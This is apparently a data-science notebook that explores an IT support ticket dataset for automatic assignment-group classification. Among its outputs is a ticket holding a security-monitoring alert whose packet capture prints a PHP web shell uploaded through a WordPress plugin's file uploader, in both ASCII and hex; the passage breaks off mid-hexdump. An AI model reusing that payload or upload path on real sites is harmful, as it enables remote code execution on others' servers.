Automatic Ticket Classification MileStone 1, 2 and 3

Due to the rise of usage of virtual systems, support ticket systems have come into prominence. Addressing the issue tickets to appropriate person or unit in the support team has critical importance in order to provide improved end user satisfaction while ensuring better allotment of support recourses. The assignment of help ticket to appropriate group is still manually performed. Especially at large organizations, the manual assignment is not applicable sufficiently. It is time consuming and requires human efforts. There may be mistakes due to human errors. Also resource consumption is carried out ineffectively because of the misaddressing.

In this project, machine learning techniques and other algorithms which proven performance in text processing are used to classify the tickets to the correct assignment groups

Objective Of The Project

The goal of the project is to build a classifier that can classify the tickets by analysing text.

The overall objective of this project are:

  • Learn how to use different classification models.
  • Use transfer learning to use pre-built models.
  • Learn to set the optimizers, loss functions, epochs, learning rate, batch size, checkpointing, early stopping etc.
  • Read different research papers of given domain to obtain the knowledge of advanced models for the given problem.

Goals:

  • Exploring the given Data files
  • Understanding the structure of data
  • Missing points in data
  • Finding inconsistencies in the data
  • Visualizing different patterns
  • Visualizing different text features
  • Dealing with missing values
  • Text preprocessing
  • Creating word vocabulary from the corpus of report text data
  • Creating tokens as required
  • Test the model and report as per evaluation metrics
  • Try different models
  • Try different evaluation metrics
  • Set different hyper parameters, by trying different optimizers, loss functions, epochs, learning rate, batch size, checkpointing, early stopping etc..for these models to fine-tune them
  • Report evaluation metrics for these models along with your observation on how changing different hyper parameters leads to change in the final evaluation metric

Dataset

Details of the dataset is in the below link:
https://drive.google.com/file/d/1OZNJm81JXucV3HmZroMq6qCT2m7ez7IJ/edit

The dataset consists of incident tickets information which are assigned to specfic groups. This dataset has 8500 rows with 4 columns.

  • Short description
  • Description
  • Caller
  • Assignment group

The target column 'Assigmnent Group' has 74 values.

In [0]:
!pip install langdetect
!pip install Unidecode
!pip install googletrans
!pip install spacy
!pip install plotly
!pip install xlrd
!pip install wordcloud
!pip install https://github.com/explosion/spacy-models/releases/download/en_core_web_sm-2.2.0/en_core_web_sm-2.2.0.tar.gz

Import the necessary libraries

In [3]:
#Import the necessary libraries
import tensorflow as tf
import pandas as pd
import numpy as np
import seaborn as sns
sns.set(color_codes = True)
from pandas import DataFrame
import nltk
from nltk.corpus import stopwords
from nltk import word_tokenize,sent_tokenize
from plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot
import plotly.graph_objs as go
from matplotlib import pyplot as plt
import string
import unidecode
import re
import spacy
from keras.regularizers import L1L2
from tensorflow.keras import regularizers
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Flatten, Bidirectional,MaxPooling1D ,SpatialDropout1D
from tensorflow.keras.models import Model, Sequential
from sklearn.model_selection import train_test_split
from sklearn import model_selection
from sklearn import preprocessing
from tensorflow.keras.callbacks import Callback, EarlyStopping, ModelCheckpoint
from nltk.stem.snowball import SnowballStemmer
from nltk.stem.wordnet import WordNetLemmatizer
from wordcloud import WordCloud
from sklearn.preprocessing import LabelEncoder
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.layers import Dense, Input, Flatten
from tensorflow.keras.layers import GlobalAveragePooling1D, Embedding, LSTM
from tensorflow.keras.models import Model
from langdetect import detect_langs
from langdetect import detect
from sklearn.svm import SVC, LinearSVC
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer, TfidfTransformer
from sklearn.metrics import confusion_matrix, classification_report, auc
from sklearn.metrics import roc_curve, accuracy_score, precision_recall_curve,f1_score
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC, LinearSVC
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import cross_val_score
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import  classification_report
from sklearn.metrics import confusion_matrix
from langdetect import detect_langs
from langdetect import detect
import gensim
from gensim.models.phrases import Phraser, Phrases
from gensim.utils import simple_preprocess
import gensim.corpora as corpora
from collections import Counter
from imblearn.under_sampling import RandomUnderSampler
import zipfile
import datetime
import sys
from tqdm  import tqdm
tqdm.pandas()
import gc
import os

Importing the data set

In [3]:
from google.colab import drive
drive.mount('/content/drive')
Go to this URL in a browser: https://accounts.google.com/o/oauth2/auth?client_id=947318989803-6bn6qk8qdgf4n4g3pfee6491hc0brc4i.apps.googleusercontent.com&redirect_uri=urn%3aietf%3awg%3aoauth%3a2.0%3aoob&response_type=code&scope=email%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdocs.test%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdrive%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdrive.photos.readonly%20https%3a%2f%2fwww.googleapis.com%2fauth%2fpeopleapi.readonly

Enter your authorization code:
··········
Mounted at /content/drive
In [5]:
project_path = '/content/drive/My Drive/CapstoneProject/'
#Reading the data to a dataframe for further processing
tickets_corpus = pd.read_excel((project_path + 'input_data.xlsx'), encoding='utf8')
#
#Displaying the first 10 rows from the data
tickets_corpus.head(5)
Out[5]:
Short description Description Caller Assignment group
0 login issue -verified user details.(employee# & manager na... spxjnwir pjlcoqds GRP_0
1 outlook \r\n\r\nreceived from: hmjdrvpb.komuaywn@gmail... hmjdrvpb komuaywn GRP_0
2 cant log in to vpn \r\n\r\nreceived from: eylqgodm.ybqkwiam@gmail... eylqgodm ybqkwiam GRP_0
3 unable to access hr_tool page unable to access hr_tool page xbkucsvz gcpydteq GRP_0
4 skype error skype error owlgqjme qhcozdfx GRP_0
In [0]:
#Reading the last 10 rows from the dataset
tickets_corpus.tail(10)
Out[0]:
Short description Description Caller Assignment group
8490 check status in purchasing please contact ed pasgryowski (pasgryo) about ... mpihysnw wrctgoan GRP_29
8491 vpn for laptop \n\nreceived from: jxgobwrm.qkugdipo@gmail.com... jxgobwrm qkugdipo GRP_34
8492 hr_tool etime option not visitble hr_tool etime option not visitble tmopbken ibzougsd GRP_0
8493 erp fi - ob09, two accounts to be added i am sorry, i have another two accounts that n... ipwjorsc uboapexr GRP_10
8494 tablet needs reimaged due to multiple issues w... tablet needs reimaged due to multiple issues w... cpmaidhj elbaqmtp GRP_3
8495 emails not coming in from zz mail \r\n\r\nreceived from: avglmrts.vhqmtiua@gmail... avglmrts vhqmtiua GRP_29
8496 telephony_software issue telephony_software issue rbozivdq gmlhrtvp GRP_0
8497 vip2: windows password reset for tifpdchb pedx... vip2: windows password reset for tifpdchb pedx... oybwdsgx oxyhwrfz GRP_0
8498 machine não está funcionando i am unable to access the machine utilities to... ufawcgob aowhxjky GRP_62
8499 an mehreren pc`s lassen sich verschiedene prgr... an mehreren pc`s lassen sich verschiedene prgr... kqvbrspl jyzoklfx GRP_49

We have successfully read the data and stored in the dataframe.

Exploratory data Analysis

In [6]:
#Shape of the dataset
tickets_corpus.shape
Out[6]:
(8500, 4)
In [7]:
tickets_corpus.info()
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 8500 entries, 0 to 8499
Data columns (total 4 columns):
 #   Column             Non-Null Count  Dtype 
---  ------             --------------  ----- 
 0   Short description  8492 non-null   object
 1   Description        8499 non-null   object
 2   Caller             8500 non-null   object
 3   Assignment group   8500 non-null   object
dtypes: object(4)
memory usage: 265.8+ KB
In [8]:
tickets_corpus.describe()
Out[8]:
Short description Description Caller Assignment group
count 8492 8499 8500 8500
unique 7481 7817 2950 74
top password reset the bpctwhsn kzqsbmtp GRP_0
freq 38 56 810 3976

The dataset comprises of 8500 rows and 4 columns. All columns are of type object containing textual information. Password reset is one of the most occuring tickets which reflects in the Short description column. The top occuring Description in the dataset is 'the', it is meaningless and we have to deal with it. Also we can see the top caller is 'bpctwhsn kzqsbmtp' and top or most frequent assignment group is GRP_0

Check missing values in the dataset

In [9]:
#Checking if the data set has any NULL OR NAN Values
tickets_corpus.isna().sum()
Out[9]:
Short description    8
Description          1
Caller               0
Assignment group     0
dtype: int64

We have very few NaN in the dataset in Short Description and Description column.

In [10]:
#displaying the data where 'Description' is null

tickets_corpus[tickets_corpus['Description'].isna()]
Out[10]:
Short description Description Caller Assignment group
4395 i am locked out of skype NaN viyglzfo ajtfzpkb GRP_0
In [11]:
#displaying the data where 'Short description' is null

tickets_corpus[tickets_corpus['Short description'].isna()]
Out[11]:
Short description Description Caller Assignment group
2604 NaN \r\n\r\nreceived from: ohdrnswl.rezuibdt@gmail... ohdrnswl rezuibdt GRP_34
3383 NaN \r\n-connected to the user system using teamvi... qftpazns fxpnytmk GRP_0
3906 NaN -user unable tologin to vpn.\r\n-connected to... awpcmsey ctdiuqwe GRP_0
3910 NaN -user unable tologin to vpn.\r\n-connected to... rhwsmefo tvphyura GRP_0
3915 NaN -user unable tologin to vpn.\r\n-connected to... hxripljo efzounig GRP_0
3921 NaN -user unable tologin to vpn.\r\n-connected to... cziadygo veiosxby GRP_0
3924 NaN name:wvqgbdhm fwchqjor\nlanguage:\nbrowser:mic... wvqgbdhm fwchqjor GRP_0
4341 NaN \r\n\r\nreceived from: eqmuniov.ehxkcbgj@gmail... eqmuniov ehxkcbgj GRP_0

As per the above analysis, where we have missing values in the 'Description' column, the corresponding 'Short description' value is present. Also where 'Short description' column has NaN values, the corresponding 'Description' column values are present. Further processing, we are going to merge these two columns, so we no need to delete these NaN rows. But since most of them are from GRP_0, we are not keeping these rows since already the data is too much biased towards the GRP_0.

In [12]:
# We will Drop these rows from the dataset
tickets_corpus.dropna(inplace=True)
print ('Shape of the dataset after Dropping NAN values', tickets_corpus.shape)
Shape of the dataset after Dropping NAN values (8491, 4)

Analysing each column of the Data!

'Assignment group' column

In [0]:
#Lets check the assignment groups and the corresponding ticket count in each group
group_ids = tickets_corpus['Assignment group'].str.split(expand=True).stack().value_counts()
print ('Number of Incidents under each unique incident group type\n', group_ids)
Number of Incidents under each unique incident group type
 GRP_0     3968
GRP_8      661
GRP_24     289
GRP_12     257
GRP_9      252
          ... 
GRP_61       1
GRP_64       1
GRP_67       1
GRP_35       1
GRP_73       1
Length: 74, dtype: int64

There are totally 74 groups , and GRP_0 has the highest number of tickets 3968 out of 8500.

In [0]:
#Lets Select all ticket Assignment groups which have only one ticket
print (tickets_corpus[tickets_corpus.groupby("Assignment group")["Assignment group"].transform('size') == 1]['Assignment group'].unique())
['GRP_35' 'GRP_61' 'GRP_64' 'GRP_67' 'GRP_70' 'GRP_73']

we have around 6 assignment groups which have only one ticket sample.

Short description Column

In [13]:
#Length of each 'Short desccription'
tickets_corpus['short_desc_len'] = tickets_corpus['Short description'].astype(str).apply(len)

#Lets get the number of words in each 'Short description'
tickets_corpus['short_des_word_count'] = tickets_corpus['Short description'].apply(lambda x: len(str(x).split()))
tickets_corpus.head()
Out[13]:
Short description Description Caller Assignment group short_desc_len short_des_word_count
0 login issue -verified user details.(employee# & manager na... spxjnwir pjlcoqds GRP_0 11 2
1 outlook \r\n\r\nreceived from: hmjdrvpb.komuaywn@gmail... hmjdrvpb komuaywn GRP_0 7 1
2 cant log in to vpn \r\n\r\nreceived from: eylqgodm.ybqkwiam@gmail... eylqgodm ybqkwiam GRP_0 18 5
3 unable to access hr_tool page unable to access hr_tool page xbkucsvz gcpydteq GRP_0 29 5
4 skype error skype error owlgqjme qhcozdfx GRP_0 12 2
In [14]:
print ('Maximum length of single record in Short Description ', tickets_corpus['short_desc_len'].max())
print ('Minimum length of single record in Short Description ', tickets_corpus['short_desc_len'].min())
print ('Average length of single record in Short Description', tickets_corpus['short_desc_len'].mean())

print ('Maximum Word count of single record of Short Description', tickets_corpus['short_des_word_count'].max())
print ('Minimum Word count of single record of Short Description', tickets_corpus['short_des_word_count'].min())
print ('Average Word count of single record of Short Description', tickets_corpus['short_des_word_count'].mean())
Maximum length of single record in Short Description  159
Minimum length of single record in Short Description  1
Average length of single record in Short Description 47.26628194558945
Maximum Word count of single record of Short Description 28
Minimum Word count of single record of Short Description 1
Average Word count of single record of Short Description 6.93393004357555
In [15]:
#Total words in the 'Short Description'
short_des_all_words = list(tickets_corpus['Short description'].str.lower().str.split(' ', expand=True).stack().unique())
print ('Total words in Short Description Column', len(short_des_all_words))
Total words in Short Description Column 10571

Let's see the Top 5 Short descriptions!

In [16]:
pd.set_option('display.max_colwidth',None)   # To display full length value of columns
In [17]:
tickets_corpus[["Description","short_des_word_count"]].sort_values(by="short_des_word_count",ascending=False).head(5)
Out[17]:
Description short_des_word_count
2881 i did a po and it received with no problem, i try to ship thru pweaver in erp and it tells me the server is unable to process the request. 28
3907 name:mehrugshy\nlanguage:\nbrowser:microsoft internet explorer\nemail:dcvphjru.ybomrjst@gmail.com\ncustomer number:\ntelephone:\nsummary:i am not able to log into my vpn. when i am trying to open a new session it is going to the "your session is finished" page 28
6307 mm#'s 7390081 and 6290061 27
2541 someone in the service center was able to successfully add a zj partner to an existing customer master account in SID_34.\r\nwe set it up that only the 9 users assigned to the sd:cust_mast_partner_func_zj role would have add/edit/delete access to this partner function.\r\nhere is a summary of what happened per lillanna:\r\nhe (ujxvrlzg pkaegicn) was using SID_34 ecc. what is strange is that the system gave him a warning that he is not allowed to add zj partner function. he could not even save changes until he cleared the zj field. but it seems the system added the zj partner function anyway when he saved the account. (the account was 81030623 and he added zj partner of 81907354.)\r\n\r\n 26
3506 name:bonhyb knepkhsw\nlanguage:\nbrowser:microsoft internet explorer\nemail:xziwkgeo.gdiraveu@gmail.com\ncustomer number:\ntelephone:\nsummary:i am trying to find an expense report to approve. i have an email that says i have one to approve. it is not showing up. 26

Description Column

In [18]:
# Length of each description
tickets_corpus['Desc_len'] = tickets_corpus['Description'].astype(str).apply(len)

# we are temporarily creating a column in the dataframe for the number of words
tickets_corpus['Des_word_count'] = tickets_corpus['Description'].apply(lambda x: len(str(x).split(" ")))
tickets_corpus.head(5)
Out[18]:
Short description Description Caller Assignment group short_desc_len short_des_word_count Desc_len Des_word_count
0 login issue -verified user details.(employee# & manager name)\r\n-checked the user name in ad and reset the password.\r\n-advised the user to login and check.\r\n-caller confirmed that he was able to login.\r\n-issue resolved. spxjnwir pjlcoqds GRP_0 11 2 206 29
1 outlook \r\n\r\nreceived from: hmjdrvpb.komuaywn@gmail.com\r\n\r\nhello team,\r\n\r\nmy meetings/skype meetings etc are not appearing in my outlook calendar, can somebody please advise how to correct this?\r\n\r\nkind hmjdrvpb komuaywn GRP_0 7 1 194 23
2 cant log in to vpn \r\n\r\nreceived from: eylqgodm.ybqkwiam@gmail.com\r\n\r\nhi\r\n\r\ni cannot log on to vpn\r\n\r\nbest eylqgodm ybqkwiam GRP_0 18 5 87 9
3 unable to access hr_tool page unable to access hr_tool page xbkucsvz gcpydteq GRP_0 29 5 29 5
4 skype error skype error owlgqjme qhcozdfx GRP_0 12 2 12 3
In [19]:
print ('Maximum length of single record of Description', tickets_corpus['Desc_len'].max())
print ('Minimum length of single record of Description', tickets_corpus['Desc_len'].min())
print ('Average length of single record of Description', tickets_corpus['Desc_len'].mean())

print ('Maximum Word count of single record of Description', tickets_corpus['Des_word_count'].max())
print ('Minimum Word count of single record of Description', tickets_corpus['Des_word_count'].min())
print ('Average Word count of single record of Description', tickets_corpus['Des_word_count'].mean())
Maximum length of single record of Description 13001
Minimum length of single record of Description 1
Average length of single record of Description 204.08173360028266
Maximum Word count of single record of Description 1417
Minimum Word count of single record of Description 1
Average Word count of single record of Description 28.88635025320928
In [20]:
#Total words in the 'Description' column
des_all_words = list(tickets_corpus['Description'].str.lower().str.split(' ', expand=True).stack().unique())
print ('Total words in Description Column', len(des_all_words))
Total words in Description Column 35007

Lets see the Top 5 longest descriptions!

In [21]:
tickets_corpus[["Description","Des_word_count"]].sort_values(by="Des_word_count",ascending=False).head(5)
Out[21]:
Description Des_word_count
7345 we are seeing activity indicating the host at 46.161.9.35 is conducting a vulnerability scan. these scans are used to identify specific vulnerabilities on a remote host that could be exploited to potentially interfere with service availability, execute code, or usa an attacker with unauthorized access. the results of this scan could be used for future attacks or exploitation of the targeted host(s). \r\n\r\nbased on our internet visibility we are detecting this as a non-targeted broadscan. similar activity from this source has been detected across our client base. please consider blocking this ip address and investigating the host for any malicious scrip\r\n\r\nwe are escalating this incident to you via a medium priority ticket as per our default event handling procedures. if you would like us to handle these incidents differently in the future (see below for handling options), or if you have any further questions or concerns, please let us know either by corresponding to us via this ticket and delegating the ticket back to the soc, or by calling us at .\r\n\r\n1)full escalation for broadscanning alerts (explicit notification via a high priority ticket and phone call)\r\n2)autoresolve for broadscanning alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)\r\n\r\nsincerely,\r\nsecureworks soc\r\n\r\n=========================\r\nevent data\r\n=========================\r\nrelated events: \r\nevent id: 43589636\r\nevent summary: 20369 vid12631 suspicious executable file upload php http incoming\r\noccurrence count: 2\r\nevent count: 2\r\n\r\nhost and connection information\r\nsource ip: 46.161.9.35\r\nsource port: 52806\r\nsource ip geolocation: st pethrywrsburg, rus\r\ndestination ip: 172.20.10.37\r\ndestination port: 80\r\nconnection directionality: incoming\r\nprotocol: tcp\r\nhttp method: post\r\nhttp status code: 404\r\nuser agent: mozilla/5.0 (windows nt 6.1; rv:34.0) gecko/31211212 firefox/34.0\r\nhost: www.companyipg.com\r\nfull url path: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php\r\n\r\ndevice information\r\ndevice ip: 172.20.10.208\r\ndevice name: isensor02.company.com\r\nlog time: 2016-08-14 at 20:38:30 utc\r\naction: not blocked\r\nvendor eventid: 655375\r\ncvss score: -1 \r\nvendor priority: 3\r\nvendor version: 7\r\nvendor reference: vid, 12631\r\nfile name: wp-setup.php\r\n\r\nscwx event processing information\r\nsherlock rule id (sle): 891631\r\ninspector rule id: 277082\r\ninspector event id: 61024435\r\nontology id: 200020003203722280\r\nevent type id: 200020003203056732\r\nagent id: 103793\r\n\r\nevent detail:\r\n[**] [1:21131470:5] 20369 vid12631 suspicious executable file upload php http incoming [**]\r\n[classification: none] [priority: 3] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]\r\n[sensor id: 602984][event id: 655375][time: 2582318221.714106]\r\n[xref => vid, 12631]\r\n[src ip: 46.161.9.35][dst ip: 172.20.10.37][sport/itype: 52806][dport/icode: 80][proto: 6]\r\n08/14/2016-20:38:30.714106 46.161.9.35:52806 -> 172.20.10.37:80\r\ntcp ttl:49 tos:0x68 id:4444 iplen:20 dgmlen:714 df\r\n***ap*** seq: 0x49c51796 ack: 0x9698e7c8 win: 0x73 tcplen: 32\r\ntcp options (3) => nop nop ts: 380683315 9237098 \r\n==pcap 1==\r\n\r\n\r\n[ex http_uri 9: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php]\r\n\r\n[ex http_hostname 10: www.companyipg.com]\r\n\r\n[o:security]\r\n\r\nascii packet(s):\r\n==pcap 1 ascii s==\r\n.......wz...........eh...\@.1.gm...#...%.f.pi..........sk2...........|..post./wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php.http/1.1..host:.www.companyipg.com..content-length:.297..accept-encoding:.gzip,.deflate..accept:.*/*..user-agent:.mozilla/5.0.(windows.nt.6.1;.rv:34.0).gecko/31211212.firefox/34.0..connection:.keep-alive..content-type:.multipart/form-data;.boundary=ba7336a47f1648dc9255eb59510e6f02....--ba7336a47f1648dc9255eb59510e6f02..content-disposition:.form-data;.name="file";.filename="wp-setup.php"..content-type:.text/plain....<?php.if.(!isset($_request['e51e'])).header("http/1.0.404.not.found");.@preg_replace('/(.*)/e',.@$_request['e51e'],.'');.?>..--ba7336a47f1648dc9255eb59510e6f02--..\r\n==pcap 1 ascii e==\r\n\r\nhex packet(s):\r\n==pcap 1 hex s==\r\n000000 0c00 0000 c6d6 b057 7ae5 0a00 ca02 0000 .......wz.......\r\n000010 ca02 0000 4568 02ca 115c 4000 3106 476d ....eh...\@.1.gm\r\n000020 2ea1 0923 ac14 0a25 ce46 0050 49c5 1796 ...#...%.f.pi...\r\n000030 9698 e7c8 8018 0073 6b32 0000 0101 080a .......sk2......\r\n000040 10a9 eeec 007c 020b 504f 5354 202f 7770 .....|..post./wp\r\n000050 2d63 6f6e 7465 6e74 2f70 6c75 6769 6e73 -content/plugins\r\n000060 2f69 6e62 6f75 6e64 696f 2d6d 6172 6b65 /inboundio-markhtye\r\n000070 7469 6e67 2f61 646d 696e 2f70 6172 7469 ting/admin/parti\r\n000080 616c 732f 6373 765f 7570 6c6f 6164 6572 als/csv_uploader\r\n000090 2e70 6870 2048 5454 502f 312e 310d 0a48 .php.http/1.1..h\r\n0000a0 6f73 743a 2077 7777 2e6b 656e 6e61 6d65 ost:.www.companyme\r\n0000b0 7461 6c69 7067 2e63 6f6d 0d0a 436f 6e74 talipg.com..cont\r\n0000c0 656e 742d 4c65 6e67 7468 3a20 3239 370d ent-length:.297.\r\n0000d0 0a41 6363 6570 742d 456e 636f 6469 6e67 .accept-encoding\r\n0000e0 3a20 677a 6970 2c20 6465 666c 6174 650d :.gzip,.deflate.\r\n0000f0 0a41 6363 6570 743a 202a 2f2a 0d0a 5573 .accept:.*/*..us\r\n000100 6572 2SID_29 6765 6e74 3a20 4d6f 7a69 6c6c er-agent:.mozill\r\n000110 612f 352e 3020 2857 696e 646f 7773 204e a/5.0.(windows.n\r\n000120 5420 362e 313b 2072 763a 3334 2e30 2920 t.6.1;.rv:34.0).\r\n000130 4765 636b 6f2f 3230 3130 3031 3031 2046 gecko/31211212.f\r\n000140 6972 6566 6f78 2f33 342e 300d 0a43 6f6e irefox/34.0..con\r\n000150 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al\r\n000160 6976 650d 0a43 6f6e 7465 6e74 2d54 7970 ive..content-typ\r\n000170 653a 206d 756c 7469 7061 7274 2f66 6f72 e:.multipart/for\r\n000180 6d2d 6461 7461 3b20 626f 756e 6461 7279 m-data;.boundary\r\n000190 3d62 6137 3333 3661 3437 6631 3634 3864 =ba7336a47f1648d\r\n0001a0 6339 3235 3565 6235 3935 3130 6536 6630 c9255eb59510e6f0\r\n0001b0 320d 0a0d 0a2d 2d62 6137 3333 3661 3437 2....--ba7336a47\r\n0001c0 6631 3634 3864 6339 3235 3565 6235 3935 f1648dc9255eb595\r\n0001d0 3130 6536 6630 320d 0a43 6f6e 7465 6e74 10e6f02..content\r\n0001e0 2d44 6973 706f 7369 7469 6f6e 3a20 666f -disposition:.fo\r\n0001f0 726d 2d64 6174 613b 206e 616d 653d 2266 rm-data;.name="f\r\n000200 696c 6522 3b20 6669 6c65 6e61 6d65 3d22 ile";.filename="\r\n000210 7770 2d73 6574 7570 2e70 6870 220d 0a43 wp-setup.php"..c\r\n000220 6f6e 7465 6e74 2d54 7970 653a 2074 6578 ontent-type:.tex\r\n000230 742f 706c 6169 6e0d 0a0d 0a3c 3f70 6870 t/plain....<?php\r\n000240 2069 6620 2821 6973 7365 7428 245f 5245 .if.(!isset($_re\r\n000250 5155 4553 545b 2765 3531 6527 5d29 2920 quest['e51e'])).\r\n000260 6865 6164 6572 2822 4854 5450 2f31 2e30 header("http/1.0\r\n000270 2034 3034 204e 6f74 2046 6f75 6e64 2229 .404.not.found")\r\n000280 3b20 4070 7265 675f 7265 706c 6163 6528 ;.@preg_replace(\r\n000290 272f 282e 2a29 2f65 272c 2040 245f 5245 '/(.*)/e',.@$_re\r\n0002a0 5155 4553 545b 2765 3531 6527 5d2c 2027 quest['e51e'],.'\r\n0002b0 2729 3b20 3f3e 0d0a 2d2d 6261 3733 3336 ');.?>..--ba7336\r\n0002c0 6134 3766 3136 3438 6463 3932 3535 6562 a47f1648dc9255eb\r\n0002d0 3539 3531 3065 3666 3032 2d2d 0d0a 59510e6f02--..\r\n==pcap 1 hex e==\r\n\r\nevent id: 43589634\r\nevent summary: 20369 vid12631 suspicious executable file upload php http incoming\r\noccurrence count: 2\r\nevent count: 2\r\n\r\nhost and connection information\r\nsource ip: 46.161.9.35\r\nsource port: 52806\r\nsource ip geolocation: st pethrywrsburg, rus\r\ndestination ip: 208.211.136.158\r\ndestination port: 80\r\nconnection directionality: incoming\r\nprotocol: tcp\r\nhttp method: post\r\nhttp status code: 404\r\nuser agent: mozilla/5.0 (windows nt 6.1; rv:34.0) gecko/31211212 firefox/34.0\r\nhost: www.companyipg.com\r\nfull url path: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php\r\n\r\ndevice information\r\ndevice ip: 208.211.136.207\r\ndevice name: isensplant_247.company.com\r\nlog time: 2016-08-14 at 20:38:30 utc\r\naction: not blocked\r\nvendor eventid: 655375\r\ncvss score: -1 \r\nvendor priority: 3\r\nvendor version: 7\r\nvendor reference: vid, 12631\r\nfile name: wp-setup.php\r\n\r\nscwx event processing information\r\nsherlock rule id (sle): 891631\r\ninspector rule id: 277082\r\ninspector event id: 61024435\r\nontology id: 200020003203722280\r\nevent type id: 200020003203056732\r\nagent id: 102989\r\n\r\nevent detail:\r\n[**] [1:21131470:5] 20369 vid12631 suspicious executable file upload php http incoming [**]\r\n[classification: none] [priority: 3] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]\r\n[sensor id: 602981][event id: 262411][time: 2582318221.758719]\r\n[xref => vid, 12631]\r\n[src ip: 46.161.9.35][dst ip: 208.211.136.158][sport/itype: 52806][dport/icode: 80][proto: 6]\r\n08/14/2016-20:38:30.758719 46.161.9.35:52806 -> 208.211.136.158:80\r\ntcp ttl:49 tos:0x68 id:4444 iplen:20 dgmlen:714 df\r\n***ap*** seq: 0x3043ff92 ack: 0xdef989b5 win: 0x73 tcplen: 32\r\ntcp options (3) => nop nop ts: 380683315 9237098 \r\n==pcap 1==\r\n\r\n\r\n[ex http_uri 9: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php]\r\n\r\n[ex http_hostname 10: www.companyipg.com]\r\n\r\n[o:security]\r\n\r\nascii packet(s):\r\n==pcap 1 ascii s==\r\n.......w............eh...\@.1..4...#.....f.p0c.........s.1...........|..post./wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php.http/1.1..host:.www.companyipg.com..content-length:.297..accept-encoding:.gzip,.deflate..accept:.*/*..user-agent:.mozilla/5.0.(windows.nt.6.1;.rv:34.0).gecko/31211212.firefox/34.0..connection:.keep-alive..content-type:.multipart/form-data;.boundary=ba7336a47f1648dc9255eb59510e6f02....--ba7336a47f1648dc9255eb59510e6f02..content-disposition:.form-data;.name="file";.filename="wp-setup.php"..content-type:.text/plain....<?php.if.(!isset($_request['e51e'])).header("http/1.0.404.not.found");.@preg_replace('/(.*)/e',.@$_request['e51e'],.'');.?>..--ba7336a47f1648dc9255eb59510e6f02--..\r\n==pcap 1 ascii e==\r\n\r\nhex packet(s):\r\n==pcap 1 hex s==\r\n000000 0c00 0000 c6d6 b057 bf93 0b00 ca02 0000 .......w........\r\n000010 ca02 0000 4568 02ca 115c 4000 3106 a434 ....eh...\@.1..4\r\n000020 2ea1 0923 d0d3 889e ce46 0050 3043 ff92 ...#.....f.p0c..\r\n000030 def9 89b5 8018 0073 0f31 0000 0101 080a .......s.1......\r\n000040 10a9 eeec 007c 020b 504f 5354 202f 7770 .....|..post./wp\r\n000050 2d63 6f6e 7465 6e74 2f70 6c75 6769 6e73 -content/plugins\r\n000060 2f69 6e62 6f75 6e64 696f 2d6d 6172 6b65 /inboundio-markhtye\r\n000070 7469 6e67 2f61 646d 696e 2f70 6172 7469 ting/admin/parti\r\n000080 616c 732f 6373 765f 7570 6c6f 6164 6572 als/csv_uploader\r\n000090 2e70 6870 2048 5454 502f 312e 310d 0a48 .php.http/1.1..h\r\n0000a0 6f73 743a 2077 7777 2e6b 656e 6e61 6d65 ost:.www.companyme\r\n0000b0 7461 6c69 7067 2e63 6f6d 0d0a 436f 6e74 talipg.com..cont\r\n0000c0 656e 742d 4c65 6e67 7468 3a20 3239 370d ent-length:.297.\r\n0000d0 0a41 6363 6570 742d 456e 636f 6469 6e67 .accept-encoding\r\n0000e0 3a20 677a 6970 2c20 6465 666c 6174 650d :.gzip,.deflate.\r\n0000f0 0a41 6363 6570 743a 202a 2f2a 0d0a 5573 .accept:.*/*..us\r\n000100 6572 2SID_29 6765 6e74 3a20 4d6f 7a69 6c6c er-agent:.mozill\r\n000110 612f 352e 3020 2857 696e 646f 7773 204e a/5.0.(windows.n\r\n000120 5420 362e 313b 2072 763a 3334 2e30 2920 t.6.1;.rv:34.0).\r\n000130 4765 636b 6f2f 3230 3130 3031 3031 2046 gecko/31211212.f\r\n000140 6972 6566 6f78 2f33 342e 300d 0a43 6f6e irefox/34.0..con\r\n000150 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al\r\n000160 6976 650d 0a43 6f6e 7465 6e74 2d54 7970 ive..content-typ\r\n000170 653a 206d 756c 7469 7061 7274 2f66 6f72 e:.multipart/for\r\n000180 6d2d 6461 7461 3b20 626f 756e 6461 7279 m-data;.boundary\r\n000190 3d62 6137 3333 3661 3437 6631 3634 3864 =ba7336a47f1648d\r\n0001a0 6339 3235 3565 6235 3935 3130 6536 6630 c9255eb59510e6f0\r\n0001b0 320d 0a0d 0a2d 2d62 6137 3333 3661 3437 2....--ba7336a47\r\n0001c0 6631 3634 3864 6339 3235 3565 6235 3935 f1648dc9255eb595\r\n0001d0 3130 6536 6630 320d 0a43 6f6e 7465 6e74 10e6f02..content\r\n0001e0 2d44 6973 706f 7369 7469 6f6e 3a20 666f -disposition:.fo\r\n0001f0 726d 2d64 6174 613b 206e 616d 653d 2266 rm-data;.name="f\r\n000200 696c 6522 3b20 6669 6c65 6e61 6d65 